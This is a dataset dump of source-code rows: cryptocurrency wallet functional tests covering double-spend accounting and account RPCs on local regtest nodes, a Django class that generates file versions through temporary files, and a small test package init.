hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 958k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f72ea474aea803c8551d2dd9a3d642ba5bdfa8bf | 6,529 | py | Python | qa/rpc-tests/txn_doublespend.py | mirzaei-ce/core-outbit | 3ebf7d8f398fa564c593433f7808d0a1d35809b9 | [
"MIT"
] | null | null | null | qa/rpc-tests/txn_doublespend.py | mirzaei-ce/core-outbit | 3ebf7d8f398fa564c593433f7808d0a1d35809b9 | [
"MIT"
] | null | null | null | qa/rpc-tests/txn_doublespend.py | mirzaei-ce/core-outbit | 3ebf7d8f398fa564c593433f7808d0a1d35809b9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with a double-spend conflict
#
from test_framework.test_framework import OutbitTestFramework
from test_framework.util import *
class TxnMallTest(OutbitTestFramework):
    """Check wallet accounting when a double-spend conflicts with
    previously recorded wallet transactions.

    NOTE(review): leading indentation was lost in extraction; the block
    structure below is restored from the code's own control flow.
    """

    def add_options(self, parser):
        # --mineblock also confirms the two initial spends in a block
        # before the conflicting transaction is mined.
        parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
                          help="Test double-spend of 1-confirmed transaction")

    def setup_network(self):
        # Start with split network:
        return super(TxnMallTest, self).setup_network(True)

    def run_test(self):
        # All nodes should start with 1,250 UBT:
        starting_balance = 1250
        for i in range(4):
            assert_equal(self.nodes[i].getbalance(), starting_balance)
            self.nodes[i].getnewaddress("")  # bug workaround, coins generated assigned to first getnewaddress!

        # Assign coins to foo and bar accounts:
        node0_address_foo = self.nodes[0].getnewaddress("foo")
        fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
        fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
        node0_address_bar = self.nodes[0].getnewaddress("bar")
        fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
        fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
        assert_equal(self.nodes[0].getbalance(""),
                     starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])

        # Coins are sent to node1_address
        node1_address = self.nodes[1].getnewaddress("from0")

        # First: use raw transaction API to send 1240 UBT to node1_address,
        # but don't broadcast:
        doublespend_fee = Decimal('-.02')
        rawtx_input_0 = {}
        rawtx_input_0["txid"] = fund_foo_txid
        rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, 1219)
        rawtx_input_1 = {}
        rawtx_input_1["txid"] = fund_bar_txid
        rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, 29)
        inputs = [rawtx_input_0, rawtx_input_1]
        change_address = self.nodes[0].getnewaddress()
        outputs = {}
        outputs[node1_address] = 1240
        outputs[change_address] = 1248 - 1240 + doublespend_fee
        rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
        doublespend = self.nodes[0].signrawtransaction(rawtx)
        assert_equal(doublespend["complete"], True)

        # Create two spends using 1 50 UBT coin each
        txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
        txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)

        # Have node0 mine a block:
        if (self.options.mine_block):
            self.nodes[0].generate(1)
            sync_blocks(self.nodes[0:2])

        tx1 = self.nodes[0].gettransaction(txid1)
        tx2 = self.nodes[0].gettransaction(txid2)

        # Node0's balance should be starting balance, plus 50UBT for another
        # matured block, minus 40, minus 20, and minus transaction fees:
        expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
        if self.options.mine_block: expected += 50
        expected += tx1["amount"] + tx1["fee"]
        expected += tx2["amount"] + tx2["fee"]
        assert_equal(self.nodes[0].getbalance(), expected)

        # foo and bar accounts should be debited:
        assert_equal(self.nodes[0].getbalance("foo", 0), 1219+tx1["amount"]+tx1["fee"])
        assert_equal(self.nodes[0].getbalance("bar", 0), 29+tx2["amount"]+tx2["fee"])

        if self.options.mine_block:
            assert_equal(tx1["confirmations"], 1)
            assert_equal(tx2["confirmations"], 1)
            # Node1's "from0" balance should be both transaction amounts:
            assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"]+tx2["amount"]))
        else:
            assert_equal(tx1["confirmations"], 0)
            assert_equal(tx2["confirmations"], 0)

        # Now give doublespend and its parents to miner:
        self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
        self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
        doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
        # ... mine a block...
        self.nodes[2].generate(1)

        # Reconnect the split network, and sync chain:
        connect_nodes(self.nodes[1], 2)
        self.nodes[2].generate(1)  # Mine another block to make sure we sync
        sync_blocks(self.nodes)
        assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)

        # Re-fetch transaction info:
        tx1 = self.nodes[0].gettransaction(txid1)
        tx2 = self.nodes[0].gettransaction(txid2)

        # Both transactions should be conflicted
        assert_equal(tx1["confirmations"], -2)
        assert_equal(tx2["confirmations"], -2)

        # Node0's total balance should be starting balance, plus 100UBT for
        # two more matured blocks, minus 1240 for the double-spend, plus fees (which are
        # negative):
        expected = starting_balance + 100 - 1240 + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
        assert_equal(self.nodes[0].getbalance(), expected)
        assert_equal(self.nodes[0].getbalance("*"), expected)

        # Final "" balance is starting_balance - amount moved to accounts - doublespend + subsidies +
        # fees (which are negative)
        assert_equal(self.nodes[0].getbalance("foo"), 1219)
        assert_equal(self.nodes[0].getbalance("bar"), 29)
        assert_equal(self.nodes[0].getbalance(""), starting_balance
                     - 1219
                     - 29
                     - 1240
                     + 100
                     + fund_foo_tx["fee"]
                     + fund_bar_tx["fee"]
                     + doublespend_fee)

        # Node1's "from0" account balance should be just the doublespend:
        assert_equal(self.nodes[1].getbalance("from0"), 1240)
if __name__ == '__main__':
    # Entry point when run directly by the functional-test runner.
    TxnMallTest().main()
| 45.657343 | 111 | 0.606065 |
from test_framework.test_framework import OutbitTestFramework
from test_framework.util import *
class TxnMallTest(OutbitTestFramework):
    """Double-spend accounting test (comment-stripped duplicate copy in
    this dataset dump; indentation restored from control flow)."""

    def add_options(self, parser):
        parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
                          help="Test double-spend of 1-confirmed transaction")

    def setup_network(self):
        # True => start the nodes on a split network.
        return super(TxnMallTest, self).setup_network(True)

    def run_test(self):
        starting_balance = 1250
        for i in range(4):
            assert_equal(self.nodes[i].getbalance(), starting_balance)
            self.nodes[i].getnewaddress("")
        node0_address_foo = self.nodes[0].getnewaddress("foo")
        fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
        fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
        node0_address_bar = self.nodes[0].getnewaddress("bar")
        fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
        fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
        assert_equal(self.nodes[0].getbalance(""),
                     starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
        node1_address = self.nodes[1].getnewaddress("from0")
        doublespend_fee = Decimal('-.02')
        rawtx_input_0 = {}
        rawtx_input_0["txid"] = fund_foo_txid
        rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, 1219)
        rawtx_input_1 = {}
        rawtx_input_1["txid"] = fund_bar_txid
        rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, 29)
        inputs = [rawtx_input_0, rawtx_input_1]
        change_address = self.nodes[0].getnewaddress()
        outputs = {}
        outputs[node1_address] = 1240
        outputs[change_address] = 1248 - 1240 + doublespend_fee
        rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
        doublespend = self.nodes[0].signrawtransaction(rawtx)
        assert_equal(doublespend["complete"], True)
        # Create two spends using 1 50 UBT coin each
        txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
        txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
        # Have node0 mine a block:
        if (self.options.mine_block):
            self.nodes[0].generate(1)
            sync_blocks(self.nodes[0:2])
        tx1 = self.nodes[0].gettransaction(txid1)
        tx2 = self.nodes[0].gettransaction(txid2)
        # Node0's balance should be starting balance, plus 50UBT for another
        expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
        if self.options.mine_block: expected += 50
        expected += tx1["amount"] + tx1["fee"]
        expected += tx2["amount"] + tx2["fee"]
        assert_equal(self.nodes[0].getbalance(), expected)
        assert_equal(self.nodes[0].getbalance("foo", 0), 1219+tx1["amount"]+tx1["fee"])
        assert_equal(self.nodes[0].getbalance("bar", 0), 29+tx2["amount"]+tx2["fee"])
        if self.options.mine_block:
            assert_equal(tx1["confirmations"], 1)
            assert_equal(tx2["confirmations"], 1)
            assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"]+tx2["amount"]))
        else:
            assert_equal(tx1["confirmations"], 0)
            assert_equal(tx2["confirmations"], 0)
        # Now give doublespend and its parents to miner:
        self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
        self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
        doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
        # ... mine a block...
        self.nodes[2].generate(1)
        # Reconnect the split network, and sync chain:
        connect_nodes(self.nodes[1], 2)
        self.nodes[2].generate(1)  # Mine another block to make sure we sync
        sync_blocks(self.nodes)
        assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
        # Re-fetch transaction info:
        tx1 = self.nodes[0].gettransaction(txid1)
        tx2 = self.nodes[0].gettransaction(txid2)
        # Both transactions should be conflicted
        assert_equal(tx1["confirmations"], -2)
        assert_equal(tx2["confirmations"], -2)
        # Node0's total balance should be starting balance, plus 100UBT for
        expected = starting_balance + 100 - 1240 + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
        assert_equal(self.nodes[0].getbalance(), expected)
        assert_equal(self.nodes[0].getbalance("*"), expected)
        assert_equal(self.nodes[0].getbalance("foo"), 1219)
        assert_equal(self.nodes[0].getbalance("bar"), 29)
        assert_equal(self.nodes[0].getbalance(""), starting_balance
                     -1219
                     - 29
                     -1240
                     + 100
                     + fund_foo_tx["fee"]
                     + fund_bar_tx["fee"]
                     + doublespend_fee)
        assert_equal(self.nodes[1].getbalance("from0"), 1240)
if __name__ == '__main__':
    # Entry point when run directly by the functional-test runner.
    TxnMallTest().main()
| true | true |
f72ea519259a797fa9330cd2c0f999cf42083662 | 3,975 | py | Python | diverse/conveyor.py | sakkada/django-diverse | dbd13bb13c3663d6149a28d94daaf06c1e47b0f4 | [
"MIT"
] | null | null | null | diverse/conveyor.py | sakkada/django-diverse | dbd13bb13c3663d6149a28d94daaf06c1e47b0f4 | [
"MIT"
] | null | null | null | diverse/conveyor.py | sakkada/django-diverse | dbd13bb13c3663d6149a28d94daaf06c1e47b0f4 | [
"MIT"
] | null | null | null | import os
import time
import shutil
import hashlib
import mimetypes
from django.core.files.storage import FileSystemStorage
from . import settings
class VersionGenerationError(Exception):
    """Raised when a file-version processing pipeline fails to produce output."""
    pass
class Conveyor(object):
    """Base class for file-version generation pipelines.

    Subclasses must assign a concrete ``storage`` and implement ``run``.
    """

    # convention: storage should operate files on local filesystem
    # to allow processors use system file operation functions
    storage_allowed = (FileSystemStorage,)
    storage = None

    def __init__(self, *args, **kwargs):
        # Fail fast if a subclass did not configure a local-filesystem storage.
        if not self.storage or not isinstance(self.storage,
                                              self.storage_allowed):
            raise ValueError('Conveyor storage should'
                             ' be in storage_allowed (local fs).')

    def run(self, filever, force=False):
        """Generate the given file version; provided by subclasses."""
        raise NotImplementedError
class TempFileConveyor(Conveyor):
    """Conveyor that runs a file version's processor chain against a
    temporary copy in ``settings.TEMPORARY_DIR`` and then saves the
    result into the version's destination storage."""

    def __init__(self, *args, **kwargs):
        self.storage = FileSystemStorage(location=settings.TEMPORARY_DIR)
        super(TempFileConveyor, self).__init__(*args, **kwargs)

    def run(self, filever, force=False):
        source_file = filever.source_file
        dest_storage = filever.storage()
        replace_mode = False

        # check self processing (equality of source and destination)
        if dest_storage.path(filever.path) == dest_storage.path(
                source_file.path) and filever.attrname == 'self':
            replace_mode = True

        # check file existance and force
        if not replace_mode and dest_storage.exists(filever.path):
            if not force:
                return
            dest_storage.delete(filever.path)

        # open (rb mode) source file
        source_closed = source_file.closed
        source_closed and source_file.open()

        # get hasher (name + wall-clock time makes the temp name unique)
        md5hash = hashlib.md5()
        md5hash.update('{}@{}'.format(source_file.name,
                                      time.time()).encode('utf-8', 'ignore'))

        # create temporary file and get mimetype
        tempname = os.path.splitext(source_file.name)
        tempname = '%s%s' % (md5hash.hexdigest(), tempname[1])
        tempname = self.storage.save(tempname, source_file)
        mimetype = mimetypes.guess_type(tempname)

        # close source
        source_closed and source_file.close()

        # safe processors call and close source
        status = True
        try:
            # run processors conveyor
            for processor in filever.processors():
                tempname, mimetype = processor.run(tempname, mimetype,
                                                   self.storage, filever)
                if not tempname:
                    break
        except Exception as e:
            status = False
            # alter default exception message
            # NOTE(review): assumes e.args is non-empty and e.args[0] is a
            # string the '%s' placeholder can absorb — confirm.
            message = ('File version "%s" generation error for "%s" at %s.'
                       ' Real reason is: %%s'
                       % (filever.attrname,
                          source_file.name, processor.__class__))
            e.args = tuple([message % e.args[0]] + list(e.args[1:]))
            raise
        else:
            if status:
                # save target file with destination storage
                # todo: check new filename correctness
                if replace_mode:
                    dest_storage.delete(filever.path)
                with self.storage.open(tempname) as tempfile:
                    dest_storage.save(filever.path, tempfile)
        finally:
            # delete temporary
            # warning: delete is unsafe with locks (especially write mode locks)
            # that means that each processor have to be extremally
            # safety with opened file pointers
            self.storage.delete(tempname)
            if not status:
                # NOTE(review): raising inside finally supersedes the
                # in-flight (re-raised) exception above — confirm this
                # replacement is intended.
                status = ('File version "%s" generation error for "%s" at %s.'
                          % (filever.attrname,
                             source_file.name, processor.__class__))
                raise VersionGenerationError(status)
| 37.149533 | 80 | 0.580881 | import os
import time
import shutil
import hashlib
import mimetypes
from django.core.files.storage import FileSystemStorage
from . import settings
class VersionGenerationError(Exception):
    """Raised when a file-version processing pipeline fails to produce output."""
    pass
class Conveyor(object):
    """Base class for file-version generation pipelines (comment-stripped
    duplicate copy in this dataset dump; indentation restored)."""

    # Storage must be a local-filesystem storage so processors can use
    # OS-level file operations.
    storage_allowed = (FileSystemStorage,)
    storage = None

    def __init__(self, *args, **kwargs):
        if not self.storage or not isinstance(self.storage,
                                              self.storage_allowed):
            raise ValueError('Conveyor storage should'
                             ' be in storage_allowed (local fs).')

    def run(self, filever, force=False):
        raise NotImplementedError
class TempFileConveyor(Conveyor):
    """Temp-file based conveyor (comment-stripped duplicate copy in this
    dataset dump; indentation restored from control flow)."""

    def __init__(self, *args, **kwargs):
        self.storage = FileSystemStorage(location=settings.TEMPORARY_DIR)
        super(TempFileConveyor, self).__init__(*args, **kwargs)

    def run(self, filever, force=False):
        source_file = filever.source_file
        dest_storage = filever.storage()
        replace_mode = False
        # Replace-in-place when the version targets its own source file.
        if dest_storage.path(filever.path) == dest_storage.path(
                source_file.path) and filever.attrname == 'self':
            replace_mode = True
        if not replace_mode and dest_storage.exists(filever.path):
            if not force:
                return
            dest_storage.delete(filever.path)
        source_closed = source_file.closed
        source_closed and source_file.open()
        md5hash = hashlib.md5()
        md5hash.update('{}@{}'.format(source_file.name,
                                      time.time()).encode('utf-8', 'ignore'))
        tempname = os.path.splitext(source_file.name)
        tempname = '%s%s' % (md5hash.hexdigest(), tempname[1])
        tempname = self.storage.save(tempname, source_file)
        mimetype = mimetypes.guess_type(tempname)
        source_closed and source_file.close()
        status = True
        try:
            for processor in filever.processors():
                tempname, mimetype = processor.run(tempname, mimetype,
                                                   self.storage, filever)
                if not tempname:
                    break
        except Exception as e:
            status = False
            message = ('File version "%s" generation error for "%s" at %s.'
                       ' Real reason is: %%s'
                       % (filever.attrname,
                          source_file.name, processor.__class__))
            e.args = tuple([message % e.args[0]] + list(e.args[1:]))
            raise
        else:
            if status:
                if replace_mode:
                    dest_storage.delete(filever.path)
                with self.storage.open(tempname) as tempfile:
                    dest_storage.save(filever.path, tempfile)
        finally:
            self.storage.delete(tempname)
            if not status:
                # NOTE(review): raising here (inside finally) supersedes the
                # re-raised exception above — confirm intended.
                status = ('File version "%s" generation error for "%s" at %s.'
                          % (filever.attrname,
                             source_file.name, processor.__class__))
                raise VersionGenerationError(status)
| true | true |
f72ea553a3dff77429beda1663ea93edb12f2be7 | 56 | py | Python | tests/__init__.py | dougppaz/pyaml_env | 09d3c43da39d5f997ac88b0b7e9945de797eca02 | [
"MIT"
] | 30 | 2021-04-27T15:26:28.000Z | 2022-03-29T17:12:36.000Z | tests/__init__.py | dougppaz/pyaml_env | 09d3c43da39d5f997ac88b0b7e9945de797eca02 | [
"MIT"
] | 12 | 2021-04-28T11:43:15.000Z | 2022-03-03T17:48:17.000Z | tests/__init__.py | dougppaz/pyaml_env | 09d3c43da39d5f997ac88b0b7e9945de797eca02 | [
"MIT"
] | 10 | 2021-04-29T00:31:08.000Z | 2022-03-14T13:49:54.000Z | import os
import sys
# Prepend the current working directory to the import path.
sys.path.insert(0, os.getcwd())
| 11.2 | 33 | 0.696429 | import os
import sys
# Prepend the current working directory to the import path.
sys.path.insert(0, os.getcwd())
| true | true |
f72ea6730b4f2126d264157f36867ba7c80f59b1 | 8,491 | py | Python | test/functional/wallet_accounts.py | ALQO-GitHub-Official/new-chain | b993c07397f91860311e2f9e207cb84fdd3a3ffa | [
"MIT"
] | 110 | 2019-07-12T11:46:31.000Z | 2022-02-18T19:47:23.000Z | test/functional/wallet_accounts.py | ALQO-GitHub-Official/new-chain | b993c07397f91860311e2f9e207cb84fdd3a3ffa | [
"MIT"
] | 29 | 2018-10-23T21:28:56.000Z | 2021-02-10T14:42:59.000Z | test/functional/wallet_accounts.py | ALQO-GitHub-Official/new-chain | b993c07397f91860311e2f9e207cb84fdd3a3ffa | [
"MIT"
] | 55 | 2018-10-20T13:40:39.000Z | 2022-03-07T07:13:02.000Z | #!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test account RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount
- listaddressgroupings
- setaccount
- sendfrom (with account arguments)
- move (with account arguments)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class WalletAccountsTest(BitcoinTestFramework):
    """Exercise the account-related wallet RPCs on a single node.

    NOTE(review): leading indentation was lost in extraction; structure
    restored from the code's control flow.
    """

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.extra_args = [[]]

    def run_test(self):
        node = self.nodes[0]
        # Check that there's no UTXO on any of the nodes
        assert_equal(len(node.listunspent()), 0)

        # Note each time we call generate, all generated coins go into
        # the same address, so we call twice to get two addresses w/50 each
        node.generate(1)
        node.generate(101)
        assert_equal(node.getbalance(), 500)

        # there should be 2 address groups
        # each with 1 address with a balance of 50 Bitcoins
        address_groups = node.listaddressgroupings()
        assert_equal(len(address_groups), 1)

        # the addresses aren't linked now, but will be after we send to the
        # common address
        linked_addresses = set()
        #for address_group in address_groups:
        #    assert_equal(len(address_group), 1)
        #    assert_equal(len(address_group[0]), 2)
        #    assert_equal(address_group[0][1], 250)
        #    linked_addresses.add(address_group[0][0])

        # send 50 from each address to a third address not in this wallet
        # There's some fee that will come back to us when the miner reward
        # matures.
        node.settxfee(0)
        common_address = "y9B3dwrBGGs3yVkyEHm68Yn36Wp2Rt7Vtd"
        txid = node.sendmany("", {common_address: 100}, 1)
        tx_details = node.gettransaction(txid)
        fee = -tx_details['details'][0]['fee']

        # there should be 1 address group, with the previously
        # unlinked addresses now linked (they both have 0 balance)
        #address_groups = node.listaddressgroupings()
        #assert_equal(len(address_groups), 1)
        #assert_equal(len(address_groups[0]), 1)
        #assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
        #assert_equal([a[1] for a in address_groups[0]], [0, 0])

        node.generate(1)

        # we want to reset so that the "" account has what's expected.
        # otherwise we're off by exactly the fee amount as that's mined
        # and matures in the next 100 blocks
        node.sendfrom("", common_address, float(fee))
        amount_to_send = 5.0

        # Create accounts and make sure subsequent account API calls
        # recognize the account/address associations.
        accounts = [Account(name) for name in ("a", "b", "c", "d", "e")]
        for account in accounts:
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)

        # Send a transaction to each account, and make sure this forces
        # getaccountaddress to generate a new receiving address.
        for account in accounts:
            node.sendtoaddress(account.receive_address, amount_to_send)
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)

        # Check the amounts received.
        node.generate(1)
        for account in accounts:
            assert_equal(
                node.getreceivedbyaddress(account.addresses[0]), amount_to_send)
            assert_equal(node.getreceivedbyaccount(account.name), amount_to_send)

        # Check that sendfrom account reduces listaccounts balances.
        for i, account in enumerate(accounts):
            to_account = accounts[(i+1) % len(accounts)]
            node.sendfrom(account.name, to_account.receive_address, amount_to_send)
        node.generate(1)
        for account in accounts:
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)
            assert_equal(node.getreceivedbyaccount(account.name), 10)
            node.move(account.name, "", float(node.getbalance(account.name)))
            account.verify(node)
        node.generate(101)
        #expected_account_balances = {"": 26149.99985650}
        #for account in accounts:
        #    expected_account_balances[account.name] = 0
        #assert_equal(node.listaccounts(), expected_account_balances)
        #assert_equal(node.getbalance(""), 26149.99985650)

        # Check that setaccount can assign an account to a new unused address.
        for account in accounts:
            address = node.getaccountaddress("")
            node.setaccount(address, account.name)
            account.add_address(address)
            account.verify(node)
            assert(address not in node.getaddressesbyaccount(""))

        # Check that addmultisigaddress can assign accounts.
        for account in accounts:
            addresses = []
            for x in range(10):
                addresses.append(node.getnewaddress())
            multisig_address = node.addmultisigaddress(5, addresses, account.name)
            account.add_address(multisig_address)
            account.verify(node)
            node.sendfrom("", multisig_address, 50)
        #node.generate(101)
        #for account in accounts:
        #    assert_equal(node.getbalance(account.name), 50)

        # Check that setaccount can change the account of an address from a
        # different account.
        change_account(node, accounts[0].addresses[0], accounts[0], accounts[1])
        # Check that setaccount can change the account of an address which
        # is the receiving address of a different account.
        change_account(node, accounts[0].receive_address, accounts[0], accounts[1])
        # Check that setaccount can set the account of an address already
        # in the account. This is a no-op.
        change_account(node, accounts[2].addresses[0], accounts[2], accounts[2])
        # Check that setaccount can set the account of an address which is
        # already the receiving address of the account. It would probably make
        # sense for this to be a no-op, but right now it resets the receiving
        # address, causing getaccountaddress to return a brand new address.
        change_account(node, accounts[2].receive_address, accounts[2], accounts[2])
class Account:
    """Tracks the addresses the test expects a wallet account to own."""

    def __init__(self, name):
        # Account name
        self.name = name
        # Current receiving address associated with this account.
        self.receive_address = None
        # List of all addresses assigned with this account
        self.addresses = []

    def add_address(self, address):
        assert_equal(address not in self.addresses, True)
        self.addresses.append(address)

    def add_receive_address(self, address):
        self.add_address(address)
        self.receive_address = address

    def verify(self, node):
        # Cross-check our expectations against the node's account RPCs.
        if self.receive_address is not None:
            assert self.receive_address in self.addresses
            assert_equal(node.getaccountaddress(self.name), self.receive_address)
        for address in self.addresses:
            assert_equal(node.getaccount(address), self.name)
        assert_equal(
            set(node.getaddressesbyaccount(self.name)), set(self.addresses))
def change_account(node, address, old_account, new_account):
    """Move ``address`` from ``old_account`` to ``new_account`` via setaccount
    and verify both accounts' state against the node."""
    assert_equal(address in old_account.addresses, True)
    node.setaccount(address, new_account.name)
    old_account.addresses.remove(address)
    new_account.add_address(address)
    # Calling setaccount on an address which was previously the receiving
    # address of a different account should reset the receiving address of
    # the old account, causing getaccountaddress to return a brand new
    # address.
    if address == old_account.receive_address:
        new_address = node.getaccountaddress(old_account.name)
        assert_equal(new_address not in old_account.addresses, True)
        assert_equal(new_address not in new_account.addresses, True)
        old_account.add_receive_address(new_address)
    old_account.verify(node)
    new_account.verify(node)
if __name__ == '__main__':
    # Entry point when run directly by the functional-test runner.
    WalletAccountsTest().main()
| 41.827586 | 83 | 0.668119 |
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class WalletAccountsTest(BitcoinTestFramework):
    """Account-RPC test (comment-stripped duplicate copy in this dataset
    dump; indentation restored from control flow)."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.extra_args = [[]]

    def run_test(self):
        node = self.nodes[0]
        assert_equal(len(node.listunspent()), 0)
        # Note each time we call generate, all generated coins go into
        # the same address, so we call twice to get two addresses w/50 each
        node.generate(1)
        node.generate(101)
        assert_equal(node.getbalance(), 500)
        # there should be 2 address groups
        # each with 1 address with a balance of 50 Bitcoins
        address_groups = node.listaddressgroupings()
        assert_equal(len(address_groups), 1)
        # the addresses aren't linked now, but will be after we send to the
        linked_addresses = set()
        # matures.
        node.settxfee(0)
        common_address = "y9B3dwrBGGs3yVkyEHm68Yn36Wp2Rt7Vtd"
        txid = node.sendmany("", {common_address: 100}, 1)
        tx_details = node.gettransaction(txid)
        fee = -tx_details['details'][0]['fee']
        # there should be 1 address group, with the previously
        # unlinked addresses now linked (they both have 0 balance)
        #address_groups = node.listaddressgroupings()
        #assert_equal(len(address_groups), 1)
        #assert_equal(len(address_groups[0]), 1)
        #assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
        #assert_equal([a[1] for a in address_groups[0]], [0, 0])
        node.generate(1)
        # we want to reset so that the "" account has what's expected.
        node.sendfrom("", common_address, float(fee))
        amount_to_send = 5.0
        accounts = [Account(name) for name in ("a", "b", "c", "d", "e")]
        for account in accounts:
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)
        for account in accounts:
            node.sendtoaddress(account.receive_address, amount_to_send)
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)
        node.generate(1)
        for account in accounts:
            assert_equal(
                node.getreceivedbyaddress(account.addresses[0]), amount_to_send)
            assert_equal(node.getreceivedbyaccount(account.name), amount_to_send)
        for i, account in enumerate(accounts):
            to_account = accounts[(i+1) % len(accounts)]
            node.sendfrom(account.name, to_account.receive_address, amount_to_send)
        node.generate(1)
        for account in accounts:
            account.add_receive_address(node.getaccountaddress(account.name))
            account.verify(node)
            assert_equal(node.getreceivedbyaccount(account.name), 10)
            node.move(account.name, "", float(node.getbalance(account.name)))
            account.verify(node)
        node.generate(101)
        for account in accounts:
            address = node.getaccountaddress("")
            node.setaccount(address, account.name)
            account.add_address(address)
            account.verify(node)
            assert(address not in node.getaddressesbyaccount(""))
        for account in accounts:
            addresses = []
            for x in range(10):
                addresses.append(node.getnewaddress())
            multisig_address = node.addmultisigaddress(5, addresses, account.name)
            account.add_address(multisig_address)
            account.verify(node)
            node.sendfrom("", multisig_address, 50)
        change_account(node, accounts[0].addresses[0], accounts[0], accounts[1])
        change_account(node, accounts[0].receive_address, accounts[0], accounts[1])
        change_account(node, accounts[2].addresses[0], accounts[2], accounts[2])
        change_account(node, accounts[2].receive_address, accounts[2], accounts[2])
class Account:
    """Expected account/address state (comment-stripped duplicate copy in
    this dataset dump; indentation restored)."""

    def __init__(self, name):
        self.name = name
        self.receive_address = None
        self.addresses = []

    def add_address(self, address):
        assert_equal(address not in self.addresses, True)
        self.addresses.append(address)

    def add_receive_address(self, address):
        self.add_address(address)
        self.receive_address = address

    def verify(self, node):
        if self.receive_address is not None:
            assert self.receive_address in self.addresses
            assert_equal(node.getaccountaddress(self.name), self.receive_address)
        for address in self.addresses:
            assert_equal(node.getaccount(address), self.name)
        assert_equal(
            set(node.getaddressesbyaccount(self.name)), set(self.addresses))
def change_account(node, address, old_account, new_account):
    """Reassign ``address`` between accounts via setaccount and verify both."""
    assert_equal(address in old_account.addresses, True)
    node.setaccount(address, new_account.name)
    old_account.addresses.remove(address)
    new_account.add_address(address)
    # Reassigning the old account's receiving address forces the node to
    # hand out a brand new receiving address for it.
    if address == old_account.receive_address:
        new_address = node.getaccountaddress(old_account.name)
        assert_equal(new_address not in old_account.addresses, True)
        assert_equal(new_address not in new_account.addresses, True)
        old_account.add_receive_address(new_address)
    old_account.verify(node)
    new_account.verify(node)
